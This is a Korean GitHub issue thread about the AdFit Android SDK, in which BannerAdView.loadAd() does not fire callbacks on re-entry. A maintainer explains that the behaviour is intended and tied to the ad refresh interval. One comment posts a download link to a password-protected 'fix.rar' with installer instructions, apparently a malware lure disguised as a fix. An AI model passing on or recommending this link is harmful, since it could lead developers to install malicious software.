### ISSUE TITLE
KaKaoAdfit BannerAdView 호출에 대한 문의

### ISSUE THREAD

**Issue by minhyukseul** [adfit/adfit-android-sdk#30]
**버그 내용**
BannerAdView의 loadAd()를 호출 했을 때 AdListener의 onAdLoaded나 onAdFailed이 호출이 되지 않고 있습니다.

**재현 방법**
간단하게 샘플 앱에서 onResume구간에 BannerAdView의 loadAd를 호출하고 라이프사이클 상으로 onResume을 호출되는 구간으로 진입해서 호출을 다시 일으킬 때 위에 언급드린 콜백함수의 호출이 일어나지 않고 있습니다.

**재현환경:**
 - Device: Android 
 - OS: OS14
 - Browser : 브라우져 상황 아님
 - Version 3.16.0

**추가 정보**
해당 상황과 관련해서 AdFit에서 지원하지 않는 방식으로 호출을 일으키고 있다면 가이드를 부탁드립니다.
유즈케이스 상 광고를 로딩하고 다른 화면으로 갔다 오는 경우 광고를 새로 로딩을 해야 되는 상황입니다.
의도된 개발 내용이시라면 이 부분과 관련해서 광고 BannerAdView를 새로 생성해서 호출을 해도 괜찮은지 확인 부탁드리겠습니다.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Unbalance09** [comment]
@minhyukseul 
안녕하세요.
정확한 내용 확인을 위해 아래 내용에 대한 이슈가 맞는지 확인 부탁드립니다.
 * 상황: "BannerAdView"에 광고가 노출 중인 상황에서 다른 화면에 진입하였다가 다시 돌아와서 loadAd()를 다시 호출
 * 예상 동작: 새로운 광고가 요청되면서 AdListener 콜백이 동작해야함
 * 실제 동작: 반응이 없으면서 AdListener 콜백이 동작하지 않음

**Comment by minhyukseul** [comment]
@Unbalance09 님
안녕하세요.
말씀하신 내용이 맞습니다.

**Comment by Unbalance09** [comment]
@minhyukseul 
확인 감사합니다.

배너 광고의 갱신(새로운 광고 요청)은 AdFit 플랫폼에서 설정 가능한 `소재 새로고침` 값에 의해 동작하고 있습니다. (최소 30초)
따라서 문의 주신 사항은 의도된 사항이며, 
다른 화면을 방문했다가`소재 새로고침` 시간만큼 시간이 지난 후에 다시 돌아온 경우에는 갱신이 동작하며, 
`소재 새로고침` 시간이 지나기 전에 다시 돌아온 경우에는 갱신이 바로 동작하지 않고 
`소재 새로고침` 시간이 지나는 시점에 갱신이 동작합니다.

BannerAdView를 새로 생성해서 호출하면 새로운 광고를 받아올 수 있지만 
과도한 요청이 발생할 경우에는 AdFit 정책에 따라 광고 송출이 중단될 수 있으니 주의하셔서 사용 부탁드립니다.

감사합니다.
